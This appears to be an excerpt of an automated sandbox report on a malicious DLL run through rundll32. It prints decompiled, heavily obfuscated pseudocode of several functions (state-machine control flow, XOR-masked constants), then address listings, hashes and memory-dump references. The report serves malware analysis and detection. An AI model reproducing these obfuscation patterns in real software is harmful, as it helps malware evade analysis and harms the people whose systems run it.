				_t269 = 0x11;
				_t262 = _v16;
				_v88 = _v88 * 0x4e;
				_v88 = _v88 ^ 0xfcf5e555;
				_v32 = 0xe4b;
				_v32 = _v32 + 0x98e4;
				_v32 = _v32 ^ 0x00008bfc;
				_v60 = 0xce72;
				_v60 = _v60 >> 3;
				_v60 = _v60 | 0xda3ba74b;
				_v60 = _v60 ^ 0xda3bee01;
				_v48 = 0x9d97;
				_v48 = _v48 >> 0xf;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x000028e0;
				_v52 = 0x36fc;
				_t270 = 0x70;
				_v52 = _v52 / _t269;
				_v52 = _v52 * 0x6a;
				_v52 = _v52 ^ 0x00012e7b;
				_v56 = 0x3c40;
				_t271 = 0x4a;
				_v56 = _v56 / _t270;
				_v56 = _v56 / _t271;
				_v56 = _v56 ^ 0x000051af;
				_v84 = 0xe49b;
				_v84 = _v84 + 0xffff8d97;
				_t272 = 0x31;
				_v84 = _v84 * 0x39;
				_v84 = _v84 * 0x73;
				_v84 = _v84 ^ 0x0b6c29a9;
				_v24 = 0x471e;
				_v24 = _v24 | 0xb0cec10e;
				_v24 = _v24 ^ 0xb0cea202;
				_v44 = 0x7985;
				_v44 = _v44 * 0x70;
				_v44 = _v44 + 0xffff691b;
				_v44 = _v44 ^ 0x003485fc;
				_v80 = 0x185c;
				_t273 = 0x5c;
				_v80 = _v80 / _t272;
				_v80 = _v80 | 0x649be726;
				_v80 = _v80 + 0x7856;
				_v80 = _v80 ^ 0x649c793b;
				while(1) {
					L1:
					_t253 = 0xe31e6;
					do {
						while(_t305 != _t253) {
							if(_t305 == 0x7c03eab) {
								_t305 = 0x2ddc9b72;
								continue;
							} else {
								if(_t305 == 0x152cdf9c) {
									_push(0x10001080);
									_push(_v108);
									_t256 = E1001BF25(_v104, _v40, __eflags);
									_pop(_t279);
									__eflags = E10013659(_v92, _v64, _v68, _v96, _v72, _t279,  &_v20, _v36, _t279, _t279, _t256, _t279, _v76, _v100);
									_t305 =  ==  ? 0xe31e6 : 0x7d7e766;
									E1001C5F7(_v28, _v88, _v32, _v60, _t256);
									_t309 =  &(_t309[0x10]);
									L16:
									_t253 = 0xe31e6;
									_t273 = 0x5c;
									goto L17;
								} else {
									if(_t305 == 0x2ddc9b72) {
										_t264 =  *0x100221b0 + 0x10;
										while(1) {
											__eflags =  *_t264 - _t273;
											if(__eflags == 0) {
												break;
											}
											_t264 = _t264 + 2;
											__eflags = _t264;
										}
										_t262 = _t264 + 2;
										_t305 = 0x152cdf9c;
										goto L1;
									} else {
										if(_t305 != 0x32e2c3ea) {
											goto L17;
										} else {
											E10015483(_v24, _v44, _v80, _v20);
										}
									}
								}
							}
							L8:
							return _v16;
						}
						_t254 = E100079A2(_t262, _v48, _v52, _v56, _v84, _v20);
						_t309 =  &(_t309[4]);
						__eflags = _t254;
						_t305 = 0x32e2c3ea;
						_t225 = _t254 == 0;
						__eflags = _t225;
						_v16 = 0 | _t225;
						goto L16;
						L17:
						__eflags = _t305 - 0x7d7e766;
					} while (__eflags != 0);
					goto L8;
				}
			}















































                                                                        0x10018f65
                                                                        0x10018f68
                                                                        0x10018f72
                                                                        0x10018f78
                                                                        0x10018f80
                                                                        0x10018f88
                                                                        0x10018f8d
                                                                        0x10018f95
                                                                        0x10018f99
                                                                        0x10018fa2
                                                                        0x10018fa6
                                                                        0x10018fab
                                                                        0x10018fb3
                                                                        0x10018fbb
                                                                        0x10018fc0
                                                                        0x10018fc8
                                                                        0x10018fd0
                                                                        0x10018fd8
                                                                        0x10018fe6
                                                                        0x10018feb
                                                                        0x10018ff6
                                                                        0x10018ff9
                                                                        0x10018ffd
                                                                        0x10019005
                                                                        0x1001900d
                                                                        0x10019015
                                                                        0x1001901d
                                                                        0x1001902a
                                                                        0x1001902e
                                                                        0x10019033
                                                                        0x1001903b
                                                                        0x10019043
                                                                        0x1001904b
                                                                        0x10019053
                                                                        0x1001905b
                                                                        0x10019060
                                                                        0x10019068
                                                                        0x10019070
                                                                        0x10019078
                                                                        0x10019080
                                                                        0x10019088
                                                                        0x10019098
                                                                        0x1001909c
                                                                        0x100190a4
                                                                        0x100190ac
                                                                        0x100190b8
                                                                        0x100190bd
                                                                        0x100190c3
                                                                        0x100190d0
                                                                        0x100190d1
                                                                        0x100190d5
                                                                        0x100190dd
                                                                        0x100190e5
                                                                        0x100190ed
                                                                        0x100190f2
                                                                        0x100190fa
                                                                        0x10019108
                                                                        0x1001910c
                                                                        0x10019114
                                                                        0x1001911e
                                                                        0x10019128
                                                                        0x10019130
                                                                        0x10019138
                                                                        0x1001913d
                                                                        0x1001914c
                                                                        0x1001914f
                                                                        0x10019153
                                                                        0x10019157
                                                                        0x1001915f
                                                                        0x10019167
                                                                        0x1001916f
                                                                        0x10019177
                                                                        0x1001917f
                                                                        0x10019184
                                                                        0x1001918c
                                                                        0x10019194
                                                                        0x1001919c
                                                                        0x100191a1
                                                                        0x100191a5
                                                                        0x100191ad
                                                                        0x100191bb
                                                                        0x100191bc
                                                                        0x100191c9
                                                                        0x100191cd
                                                                        0x100191d5
                                                                        0x100191e3
                                                                        0x100191e4
                                                                        0x100191f2
                                                                        0x100191f8
                                                                        0x10019200
                                                                        0x10019208
                                                                        0x10019215
                                                                        0x10019218
                                                                        0x10019221
                                                                        0x10019225
                                                                        0x1001922d
                                                                        0x10019235
                                                                        0x1001923d
                                                                        0x10019245
                                                                        0x10019252
                                                                        0x10019256
                                                                        0x1001925e
                                                                        0x10019266
                                                                        0x10019274
                                                                        0x10019275
                                                                        0x10019279
                                                                        0x10019281
                                                                        0x10019289
                                                                        0x10019291
                                                                        0x10019291
                                                                        0x10019291
                                                                        0x10019296
                                                                        0x10019296
                                                                        0x100192a4
                                                                        0x10019378
                                                                        0x00000000
                                                                        0x100192aa
                                                                        0x100192ac
                                                                        0x100192ff
                                                                        0x10019304
                                                                        0x10019310
                                                                        0x10019316
                                                                        0x1001934d
                                                                        0x1001936b
                                                                        0x1001936e
                                                                        0x10019373
                                                                        0x100193b0
                                                                        0x100193b2
                                                                        0x100193b7
                                                                        0x00000000
                                                                        0x100192ae
                                                                        0x100192b4
                                                                        0x100192eb
                                                                        0x100192f3
                                                                        0x100192f3
                                                                        0x100192f6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100192f0
                                                                        0x100192f0
                                                                        0x100192f0
                                                                        0x100192f8
                                                                        0x100192fb
                                                                        0x00000000
                                                                        0x100192b6
                                                                        0x100192bc
                                                                        0x00000000
                                                                        0x100192c2
                                                                        0x100192d2
                                                                        0x100192d8
                                                                        0x100192bc
                                                                        0x100192b4
                                                                        0x100192ac
                                                                        0x100192d9
                                                                        0x100192e4
                                                                        0x100192e4
                                                                        0x10019398
                                                                        0x1001939f
                                                                        0x100193a2
                                                                        0x100193a4
                                                                        0x100193a9
                                                                        0x100193a9
                                                                        0x100193ac
                                                                        0x00000000
                                                                        0x100193b8
                                                                        0x100193b8
                                                                        0x100193b8
                                                                        0x00000000
                                                                        0x100193c4

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8y$@<$Vx$Y'}A$\m$a_$b[31$(
                                                                        • API String ID: 0-4115005019
                                                                        • Opcode ID: e2e8ff945d430b1b85599ee90a7361c4b7ac6e1ec00f878610a2fea6c08387fb
                                                                        • Instruction ID: 8b0e813e3e5c3b84958ad50093081c7edbab459e4345c4ad5d1788e5b52fe82d
                                                                        • Opcode Fuzzy Hash: e2e8ff945d430b1b85599ee90a7361c4b7ac6e1ec00f878610a2fea6c08387fb
                                                                        • Instruction Fuzzy Hash: 65B1FF715083409FE358CF25C98A90BBBE2FBC5748F10891DF1999A2A0D7B9DA498F46
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10003D4E, Relevance: 10.2, Strings: 8, Instructions: 245COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E10003D4E(intOrPtr __ecx, void* __edx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t231;
				intOrPtr _t232;
				intOrPtr* _t233;
				intOrPtr* _t236;
				intOrPtr _t238;
				intOrPtr* _t239;
				intOrPtr _t243;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				intOrPtr* _t269;
				void* _t270;
				void* _t272;
				signed int* _t273;

				_t273 =  &_v112;
				_v72 = 0x5582;
				_v72 = _v72 >> 1;
				_t272 = __edx;
				_t243 = __ecx;
				_t269 = 0;
				_t245 = 0x51;
				_v72 = _v72 / _t245;
				_v72 = _v72 ^ 0x0000601c;
				_t270 = 0x1322e1ec;
				_v36 = 0xc7c9;
				_v36 = _v36 | 0xbc8756ca;
				_v36 = _v36 ^ 0xbc8791da;
				_v56 = 0xdb25;
				_v56 = _v56 + 0xa75d;
				_v56 = _v56 ^ 0x0001a8e8;
				_v112 = 0xc6db;
				_v112 = _v112 >> 0xb;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 + 0xd338;
				_v112 = _v112 ^ 0x0000d633;
				_v76 = 0xc37;
				_v76 = _v76 >> 3;
				_v76 = _v76 | 0xce4966ab;
				_v76 = _v76 ^ 0xce4936b0;
				_v108 = 0xb399;
				_v108 = _v108 << 0x10;
				_v108 = _v108 >> 1;
				_v108 = _v108 | 0x0148f084;
				_v108 = _v108 ^ 0x59ccb068;
				_v80 = 0xaa79;
				_v80 = _v80 + 0x2a7d;
				_v80 = _v80 >> 5;
				_v80 = _v80 ^ 0x0000706a;
				_v52 = 0x1cb3;
				_v52 = _v52 | 0xdfdf2f63;
				_v52 = _v52 ^ 0xdfdf2d78;
				_v40 = 0x2796;
				_v40 = _v40 << 9;
				_v40 = _v40 ^ 0x004f7581;
				_v44 = 0x2f1a;
				_t246 = 0x64;
				_v44 = _v44 / _t246;
				_v44 = _v44 ^ 0x0000485d;
				_v48 = 0x187a;
				_v48 = _v48 + 0x126d;
				_v48 = _v48 ^ 0x000074b0;
				_v104 = 0x9317;
				_v104 = _v104 >> 8;
				_v104 = _v104 << 5;
				_v104 = _v104 + 0xe504;
				_v104 = _v104 ^ 0x0000e32e;
				_v100 = 0xf551;
				_v100 = _v100 ^ 0x5a167e7d;
				_v100 = _v100 >> 7;
				_v100 = _v100 >> 0xe;
				_v100 = _v100 ^ 0x00000292;
				_v28 = 0x87ec;
				_v28 = _v28 + 0xffffd24f;
				_v28 = _v28 ^ 0x00002fae;
				_v32 = 0x1a62;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x000d761f;
				_v68 = 0x4d45;
				_v68 = _v68 + 0xffff90af;
				_v68 = _v68 >> 4;
				_v68 = _v68 ^ 0x0fff89e8;
				_v12 = 0x8a80;
				_v12 = _v12 | 0x7f7c99ee;
				_v12 = _v12 ^ 0x7f7cab2a;
				_v16 = 0x19cc;
				_v16 = _v16 + 0xffff6b5c;
				_v16 = _v16 ^ 0xfffffdf7;
				_v20 = 0x88ed;
				_v20 = _v20 | 0x3d0cae91;
				_v20 = _v20 ^ 0x3d0caeb7;
				_v24 = 0xdb7;
				_v24 = _v24 + 0xffffd9aa;
				_v24 = _v24 ^ 0xffffae78;
				_v96 = 0xd89d;
				_v96 = _v96 ^ 0x4d812d2a;
				_v96 = _v96 << 0xd;
				_v96 = _v96 << 2;
				_v96 = _v96 ^ 0xfadb9b11;
				_v60 = 0x63dc;
				_t247 = 0x73;
				_v60 = _v60 * 0x5f;
				_v60 = _v60 ^ 0x00257e00;
				_v64 = 0xaca0;
				_v64 = _v64 + 0x1639;
				_v64 = _v64 ^ 0x0000d793;
				_v84 = 0x1d64;
				_v84 = _v84 * 0x49;
				_v84 = _v84 + 0x2f18;
				_v84 = _v84 ^ 0x0008f6d2;
				_v4 = 0xa1b0;
				_v4 = _v4 + 0xca2d;
				_v4 = _v4 ^ 0x000177a9;
				_v88 = 0xa1e4;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 + 0x87da;
				_v88 = _v88 << 7;
				_v88 = _v88 ^ 0x0043e3cc;
				_v8 = 0x4904;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x001263b3;
				_v92 = 0x6a47;
				_v92 = _v92 + 0xffffd61f;
				_v92 = _v92 + 0xffffa4a6;
				_v92 = _v92 / _t247;
				_v92 = _v92 ^ 0x02399718;
				while(1) {
					L1:
					_t231 = 0xbbd3b0e;
					do {
						L2:
						while(_t270 != _t231) {
							if(_t270 == 0x11fd89d0) {
								_t247 = _v100;
								_t233 = E10008997(_t247, _v28, _v32, _v68,  *_t269);
								_t273 =  &(_t273[3]);
								 *((intOrPtr*)(_t269 + 0x1c)) = _t233;
								__eflags = _t233;
								_t231 = 0xbbd3b0e;
								_t270 =  !=  ? 0xbbd3b0e : 0x2e937f96;
								continue;
							}
							if(_t270 != 0x1322e1ec) {
								if(_t270 == 0x17e19405) {
									return E100091CD(_v4, _v88, _v8, _t269, _v92);
								}
								if(_t270 == 0x25daab44) {
									 *((intOrPtr*)(_t269 + 0x20)) = _t243;
									_t238 =  *0x10021400; // 0x0
									 *((intOrPtr*)(_t269 + 0x10)) = _t238;
									 *0x10021400 = _t269;
									return _t238;
								}
								if(_t270 == 0x29623426) {
									_push(_v112);
									_t239 = E10005BE1(_v56, _t272, __eflags, _t247);
									 *_t269 = _t239;
									_pop(_t247);
									__eflags = _t239;
									if(__eflags == 0) {
										goto L10;
									} else {
										E100039D1(_v108, _v80,  *_t269, _v52, _t239);
										_t247 = _v40;
										E100056B3(_v44, _v48,  *_t269, _v104);
										_t273 =  &(_t273[7]);
										_t270 = 0x11fd89d0;
										while(1) {
											L1:
											_t231 = 0xbbd3b0e;
											goto L2;
										}
									}
									goto L13;
								} else {
									if(_t270 != 0x2e937f96) {
										goto L19;
									} else {
										E10018C8B(_v60, _v64, _v84,  *_t269);
										_pop(_t247);
										L10:
										_t270 = 0x17e19405;
										while(1) {
											L1:
											_t231 = 0xbbd3b0e;
											goto L2;
										}
									}
								}
								L23:
								return _t236;
							}
							L13:
							_t248 = 0x24;
							_t236 = E100157E8(_t248);
							_t269 = _t236;
							_t247 = _t247;
							__eflags = _t269;
							if(__eflags != 0) {
								_t270 = 0x29623426;
								while(1) {
									L1:
									_t231 = 0xbbd3b0e;
									goto L2;
								}
							}
							goto L23;
						}
						_t247 = _v12;
						_t232 = E1000D6D8(_t247, _v16, _t247, E10008816, _v20, _t247, _t269, _t247, _t247, _v24, _v96);
						_t273 =  &(_t273[9]);
						 *((intOrPtr*)(_t269 + 4)) = _t232;
						__eflags = _t232;
						if(__eflags == 0) {
							_t270 = 0x2e937f96;
							_t231 = 0xbbd3b0e;
							goto L19;
						} else {
							_t270 = 0x25daab44;
							goto L1;
						}
						goto L23;
						L19:
						__eflags = _t270 - 0x32655ae2;
					} while (__eflags != 0);
					return _t231;
				}
			}














































                                                                        0x10003d4e
                                                                        0x10003d51
                                                                        0x10003d59
                                                                        0x10003d65
                                                                        0x10003d67
                                                                        0x10003d6d
                                                                        0x10003d6f
                                                                        0x10003d74
                                                                        0x10003d7a
                                                                        0x10003d82
                                                                        0x10003d87
                                                                        0x10003d8f
                                                                        0x10003d97
                                                                        0x10003d9f
                                                                        0x10003da7
                                                                        0x10003daf
                                                                        0x10003db7
                                                                        0x10003dbf
                                                                        0x10003dc4
                                                                        0x10003dc9
                                                                        0x10003dd1
                                                                        0x10003dd9
                                                                        0x10003de1
                                                                        0x10003de6
                                                                        0x10003dee
                                                                        0x10003df6
                                                                        0x10003dfe
                                                                        0x10003e03
                                                                        0x10003e07
                                                                        0x10003e0f
                                                                        0x10003e17
                                                                        0x10003e1f
                                                                        0x10003e27
                                                                        0x10003e2c
                                                                        0x10003e34
                                                                        0x10003e3c
                                                                        0x10003e44
                                                                        0x10003e4c
                                                                        0x10003e54
                                                                        0x10003e59
                                                                        0x10003e61
                                                                        0x10003e6d
                                                                        0x10003e70
                                                                        0x10003e74
                                                                        0x10003e7c
                                                                        0x10003e84
                                                                        0x10003e8c
                                                                        0x10003e94
                                                                        0x10003e9c
                                                                        0x10003ea1
                                                                        0x10003ea6
                                                                        0x10003eae
                                                                        0x10003eb6
                                                                        0x10003ebe
                                                                        0x10003ec6
                                                                        0x10003ecb
                                                                        0x10003ed0
                                                                        0x10003ed8
                                                                        0x10003ee0
                                                                        0x10003ee8
                                                                        0x10003ef0
                                                                        0x10003ef8
                                                                        0x10003efd
                                                                        0x10003f05
                                                                        0x10003f0d
                                                                        0x10003f15
                                                                        0x10003f1a
                                                                        0x10003f22
                                                                        0x10003f2a
                                                                        0x10003f32
                                                                        0x10003f3a
                                                                        0x10003f44
                                                                        0x10003f4c
                                                                        0x10003f54
                                                                        0x10003f5c
                                                                        0x10003f64
                                                                        0x10003f6c
                                                                        0x10003f74
                                                                        0x10003f7c
                                                                        0x10003f84
                                                                        0x10003f8c
                                                                        0x10003f94
                                                                        0x10003f99
                                                                        0x10003f9e
                                                                        0x10003fa6
                                                                        0x10003fb5
                                                                        0x10003fb6
                                                                        0x10003fba
                                                                        0x10003fc2
                                                                        0x10003fca
                                                                        0x10003fd2
                                                                        0x10003fda
                                                                        0x10003fe7
                                                                        0x10003feb
                                                                        0x10003ff3
                                                                        0x10003ffb
                                                                        0x10004003
                                                                        0x1000400b
                                                                        0x10004013
                                                                        0x1000401b
                                                                        0x10004020
                                                                        0x10004028
                                                                        0x1000402d
                                                                        0x10004035
                                                                        0x1000403d
                                                                        0x10004042
                                                                        0x1000404a
                                                                        0x10004052
                                                                        0x1000405a
                                                                        0x10004068
                                                                        0x1000406c
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x10004079
                                                                        0x00000000
                                                                        0x10004079
                                                                        0x10004087
                                                                        0x10004169
                                                                        0x1000416d
                                                                        0x10004172
                                                                        0x10004175
                                                                        0x10004178
                                                                        0x1000417f
                                                                        0x10004184
                                                                        0x00000000
                                                                        0x10004184
                                                                        0x10004093
                                                                        0x1000409f
                                                                        0x00000000
                                                                        0x10004213
                                                                        0x100040ab
                                                                        0x100041e4
                                                                        0x100041e7
                                                                        0x100041ec
                                                                        0x100041ef
                                                                        0x00000000
                                                                        0x100041ef
                                                                        0x100040b7
                                                                        0x100040e1
                                                                        0x100040ec
                                                                        0x100040f1
                                                                        0x100040f4
                                                                        0x100040f5
                                                                        0x100040f7
                                                                        0x00000000
                                                                        0x100040f9
                                                                        0x1000410c
                                                                        0x1000411f
                                                                        0x10004123
                                                                        0x10004128
                                                                        0x1000412b
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x00000000
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x00000000
                                                                        0x100040b9
                                                                        0x100040bf
                                                                        0x00000000
                                                                        0x100040c5
                                                                        0x100040d3
                                                                        0x100040d9
                                                                        0x100040da
                                                                        0x100040da
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x00000000
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x100040bf
                                                                        0x1000421d
                                                                        0x1000421d
                                                                        0x1000421d
                                                                        0x10004135
                                                                        0x10004140
                                                                        0x10004141
                                                                        0x10004146
                                                                        0x10004148
                                                                        0x10004149
                                                                        0x1000414b
                                                                        0x10004151
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x00000000
                                                                        0x10004074
                                                                        0x10004074
                                                                        0x00000000
                                                                        0x1000414b
                                                                        0x100041ac
                                                                        0x100041b3
                                                                        0x100041b8
                                                                        0x100041bb
                                                                        0x100041be
                                                                        0x100041c0
                                                                        0x100041cc
                                                                        0x100041d1
                                                                        0x00000000
                                                                        0x100041c2
                                                                        0x100041c2
                                                                        0x00000000
                                                                        0x100041c2
                                                                        0x00000000
                                                                        0x100041d6
                                                                        0x100041d6
                                                                        0x100041d6
                                                                        0x00000000
                                                                        0x10004079

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &4b)$&4b)$.$EM$Gj$]H$jp$Ze2
                                                                        • API String ID: 0-3831357560
                                                                        • Opcode ID: fad2b6a6da34d5a79a599ec2a751447f4d4df015aa6644864e5b89069f857f56
                                                                        • Instruction ID: 8a5446e4f8035bc658c840a08d927aab7b0b9702947ac2468c43b6993038afce
                                                                        • Opcode Fuzzy Hash: fad2b6a6da34d5a79a599ec2a751447f4d4df015aa6644864e5b89069f857f56
                                                                        • Instruction Fuzzy Hash: 12C141B25083419BE354CF21C88944FBBE1FB94788F204A1DF595962A4E7B9D948CF87
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000704B, Relevance: 10.2, Strings: 8, Instructions: 208COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1000704B() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _t185;
				void* _t186;
				signed int _t187;
				void* _t193;
				void* _t213;
				void* _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				intOrPtr* _t226;
				signed int _t227;
				signed int* _t228;

				_t228 =  &_v68;
				_v60 = 0x1d43;
				_v60 = _v60 << 0xc;
				_t193 = 0x3977c092;
				_v60 = _v60 + 0x28c6;
				_v60 = _v60 ^ 0xdcba1064;
				_v60 = _v60 ^ 0xdd6f48a2;
				_v20 = 0xe9e;
				_v20 = _v20 | 0x1058ed95;
				_v20 = _v20 ^ 0x210197a0;
				_v20 = _v20 ^ 0x31590bf2;
				_v24 = 0x25e5;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x00002580;
				_v28 = 0x30bc;
				_v28 = _v28 | 0xe7a908b3;
				_v28 = _v28 * 0x23;
				_t218 = 0;
				_v28 = _v28 ^ 0xac22ac2a;
				_v56 = 0xe775;
				_v56 = _v56 >> 5;
				_v56 = _v56 + 0x1b94;
				_v56 = _v56 << 6;
				_v56 = _v56 ^ 0x0008bd00;
				_v32 = 0xff32;
				_v32 = _v32 >> 2;
				_v32 = _v32 | 0xd7112a41;
				_v32 = _v32 ^ 0xd7116591;
				_v64 = 0x688b;
				_v64 = _v64 + 0xadbd;
				_v64 = _v64 + 0x2af1;
				_v64 = _v64 + 0xffffcd5d;
				_v64 = _v64 ^ 0x00013bdf;
				_v68 = 0xd7fc;
				_v68 = _v68 | 0x40cef50a;
				_v68 = _v68 >> 2;
				_v68 = _v68 << 5;
				_v68 = _v68 ^ 0x0677a26b;
				_v4 = 0x4a94;
				_v4 = _v4 + 0xffffb7ad;
				_v4 = _v4 ^ 0x00004a42;
				_v8 = 0xf2c8;
				_t219 = 0x70;
				_v8 = _v8 / _t219;
				_v8 = _v8 ^ 0x000043de;
				_v36 = 0x586c;
				_t220 = 0x3c;
				_v36 = _v36 / _t220;
				_v36 = _v36 >> 7;
				_v36 = _v36 ^ 0x00005cc4;
				_v12 = 0x23ea;
				_v12 = _v12 + 0x3510;
				_v12 = _v12 ^ 0x00007e07;
				_v40 = 0xa101;
				_v40 = _v40 << 0xd;
				_v40 = _v40 + 0x4a49;
				_t221 = 0x14;
				_v40 = _v40 * 0xc;
				_v40 = _v40 ^ 0xf184ff7e;
				_v44 = 0xbfff;
				_v44 = _v44 | 0x69fcb387;
				_v44 = _v44 * 0x2d;
				_v44 = _v44 / _t221;
				_v44 = _v44 ^ 0x081251c3;
				_v48 = 0xf126;
				_t222 = 0x18;
				_v48 = _v48 / _t222;
				_v48 = _v48 << 1;
				_t223 = 0x4c;
				_t227 = _v4;
				_v48 = _v48 / _t223;
				_v48 = _v48 ^ 0x00005fbf;
				_t192 = _v4;
				_t224 = _v4;
				_v16 = 0x73ee;
				_v16 = _v16 << 0xc;
				_v16 = _v16 * 0x45;
				_v16 = _v16 ^ 0xf3f273d0;
				_v52 = 0x98da;
				_v52 = _v52 | 0x54ea2f47;
				_v52 = _v52 + 0xc0b4;
				_v52 = _v52 << 9;
				_v52 = _v52 ^ 0xd70e263f;
				while(1) {
					L1:
					_t213 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t193 != 0x1e3c7a) {
								if(_t193 == 0x1cae070b) {
									_t187 = E10017C1D(_v28, _v56, _t192, _t224, _v60, _v32);
									_t228 =  &(_t228[4]);
									_t227 = _t187;
									_t186 = 0x32ab8bb4;
									_t193 =  !=  ? 0x32ab8bb4 : 0x242cd2c8;
									_t213 = 0x5c;
									continue;
								} else {
									if(_t193 == 0x242cd2c8) {
										E1001F23C(_v40, _t192, _v44, _v48, _v16);
									} else {
										if(_t193 == _t186) {
											E10013C8B(_t227, _v64, _v68);
											_t218 =  !=  ? 1 : _t218;
											_t193 = 0x3667c679;
											while(1) {
												L1:
												_t213 = 0x5c;
												goto L2;
											}
										} else {
											if(_t193 == 0x336046fa) {
												_t226 =  *0x100221b0 + 0x10;
												while( *_t226 != _t213) {
													_t226 = _t226 + 2;
												}
												_t224 = _t226 + 2;
												_t193 = 0x1e3c7a;
												goto L2;
											} else {
												if(_t193 == 0x3667c679) {
													E1001F23C(_v4, _t227, _v8, _v36, _v12);
													_t228 =  &(_t228[3]);
													_t193 = 0x242cd2c8;
													while(1) {
														L1:
														_t213 = 0x5c;
														L2:
														goto L3;
													}
												} else {
													if(_t193 != 0x3977c092) {
														goto L21;
													} else {
														_t193 = 0x336046fa;
														continue;
													}
												}
											}
										}
									}
								}
								L24:
								return _t218;
							}
							_t185 = E1000DA66(_v52, _t213, _v20, _t193, _v24);
							_t192 = _t185;
							_t228 =  &(_t228[3]);
							if(_t185 == 0) {
								_t193 = 0x2f5bcc41;
								_t186 = 0x32ab8bb4;
								_t213 = 0x5c;
								goto L21;
							} else {
								_t193 = 0x1cae070b;
								goto L1;
							}
							goto L24;
							L21:
						} while (_t193 != 0x2f5bcc41);
						goto L24;
					}
				}
			}



































                                                                        0x1000704b
                                                                        0x1000704e
                                                                        0x10007058
                                                                        0x1000705d
                                                                        0x10007062
                                                                        0x1000706a
                                                                        0x10007072
                                                                        0x1000707a
                                                                        0x10007082
                                                                        0x1000708a
                                                                        0x10007092
                                                                        0x1000709a
                                                                        0x100070a2
                                                                        0x100070a7
                                                                        0x100070ac
                                                                        0x100070b4
                                                                        0x100070bc
                                                                        0x100070cd
                                                                        0x100070d1
                                                                        0x100070d3
                                                                        0x100070db
                                                                        0x100070e3
                                                                        0x100070e8
                                                                        0x100070f0
                                                                        0x100070f5
                                                                        0x100070fd
                                                                        0x10007105
                                                                        0x1000710a
                                                                        0x10007112
                                                                        0x1000711a
                                                                        0x10007122
                                                                        0x1000712a
                                                                        0x10007132
                                                                        0x1000713a
                                                                        0x10007142
                                                                        0x1000714a
                                                                        0x10007152
                                                                        0x10007157
                                                                        0x1000715c
                                                                        0x10007164
                                                                        0x1000716c
                                                                        0x10007174
                                                                        0x1000717c
                                                                        0x1000718a
                                                                        0x1000718f
                                                                        0x10007195
                                                                        0x1000719d
                                                                        0x100071a9
                                                                        0x100071ae
                                                                        0x100071b4
                                                                        0x100071b9
                                                                        0x100071c1
                                                                        0x100071c9
                                                                        0x100071d1
                                                                        0x100071d9
                                                                        0x100071e1
                                                                        0x100071e6
                                                                        0x100071f3
                                                                        0x100071f4
                                                                        0x100071f8
                                                                        0x10007200
                                                                        0x10007208
                                                                        0x10007215
                                                                        0x1000721f
                                                                        0x10007225
                                                                        0x1000722d
                                                                        0x1000723b
                                                                        0x10007240
                                                                        0x10007246
                                                                        0x1000724e
                                                                        0x10007251
                                                                        0x10007255
                                                                        0x10007259
                                                                        0x10007261
                                                                        0x10007265
                                                                        0x10007269
                                                                        0x10007271
                                                                        0x1000727b
                                                                        0x1000727f
                                                                        0x10007287
                                                                        0x1000728f
                                                                        0x10007297
                                                                        0x1000729f
                                                                        0x100072a4
                                                                        0x100072ac
                                                                        0x100072ac
                                                                        0x100072ae
                                                                        0x100072af
                                                                        0x100072af
                                                                        0x100072b4
                                                                        0x00000000
                                                                        0x100072b4
                                                                        0x100072c6
                                                                        0x10007374
                                                                        0x10007379
                                                                        0x1000737c
                                                                        0x10007385
                                                                        0x1000738a
                                                                        0x1000738f
                                                                        0x00000000
